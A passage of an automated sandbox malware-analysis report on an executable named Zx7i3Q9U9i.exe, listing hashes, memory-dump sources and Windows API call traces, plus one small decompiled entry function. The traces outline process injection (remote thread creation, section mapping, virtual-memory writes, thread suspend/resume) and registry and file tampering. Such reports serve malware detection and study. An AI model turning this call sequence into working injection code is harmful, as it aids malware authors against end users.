    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed: image base of the current module
				_t2 = HeapCreate(0, 0x10000, 0); // executed: private heap, 0x10000 bytes initial size
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					// E00401639 (see APIs below) starts the worker threads and waits for them
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);   // the status code becomes the thread exit code
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:8905AD755F4CDCD7C4AF3FD546F67BFC
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:65738
Initial sample SHA 256:41F89827217F8749BBD170FDEBE998922F40CCF43225BAEF9395DB8A70D056C4
Initial sample name:.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
